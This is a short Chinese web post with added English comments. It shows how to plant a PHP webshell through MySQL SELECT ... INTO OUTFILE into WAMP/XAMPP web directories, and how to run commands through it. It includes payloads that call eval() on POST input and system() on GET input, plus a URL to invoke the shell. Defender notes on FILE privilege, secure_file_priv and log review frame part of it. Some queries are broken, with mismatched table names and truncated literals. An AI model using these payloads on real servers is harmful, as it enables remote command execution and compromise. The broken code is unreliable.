作者:手机用户2502854041 | 来源:互联网 | 2017-11-12 12:27
-- Pattern shown: a MySQL session that stages text in a throwaway table and then
-- exports it with SELECT ... INTO OUTFILE to a .php path under a local web stack
-- directory (WAMP / XAMPP paths below). INTO OUTFILE writes on the database
-- server host, needs the FILE privilege, and is limited by secure_file_priv.
-- Defender view: restrict secure_file_priv to a dedicated directory, do not grant
-- FILE to application accounts, and keep web directories non-writable for the
-- database service account. In query/audit logs, look for INTO OUTFILE targeting
-- web-served paths and for short-lived tables created and dropped around it.

-- Staging table with a single NOT NULL text column.
Create TABLE linuxso (cmd text NOT NULL);
-- Inserts one row whose value is a PHP fragment calling eval() on the POST
-- parameter `cmd`; it is only data until a PHP interpreter serves it.
Insert INTO linuxso (cmd) VALUES('php eval($_POST[cmd])?>');
-- Exports the cmd column of table `study` to a .php file under E:/wamp/www.
select cmd from study into outfile 'E:/wamp/www/7.php';
-- Cleanup: removes the table so it does not remain in the schema afterwards.
Drop TABLE IF EXISTS study;
-- Second variant of the same sequence: MyISAM table `wangzi` with one TEXT column;
-- the inserted literal is an empty string as the page shows it.
Create TABLE `wangzi` (`wangzi` TEXT NOT NULL) TYPE = MYISAM; Insert INTO `wangzi` ( `wangzi` ) VALUES ('');
-- Exports that column to a .php path under the XAMPP htdocs tree, then drops the table.
Select `wangzi` FROM `wangzi` INTO OUTFILE 'C:/xampp/htdocs/xampp/cmd.php'; Drop TABLE `wangzi`;
--------------------------------------------------------------------------
而后在国外bbs论坛上看到一老外的方法更简单:
1:select load_file('E:/xamp/www/linuxso.php');
2:select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/linuxso.php'
然后访问网站目录:http://localhost/linuxso.php?cmd=dir
3:写一句话: select ''INTO OUTFILE 'E:/xamp/www/linuxso.php'
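第三个是直接在SQL查询里导出一句话,前提是必须先知道网站的物理路径。以上几种写法都依赖 INTO OUTFILE:数据库账号需要具有 FILE 权限,secure_file_priv 没有限制导出目录,并且数据库进程对 Web 目录可写。防护上应将 secure_file_priv 限定到专用目录,不给应用账号授予 FILE 权限,并禁止数据库服务账号写入 Web 目录;排查时可在查询日志中检索指向 Web 目录的 INTO OUTFILE 语句,并留意 Web 目录下由数据库服务账号创建的 .php 文件。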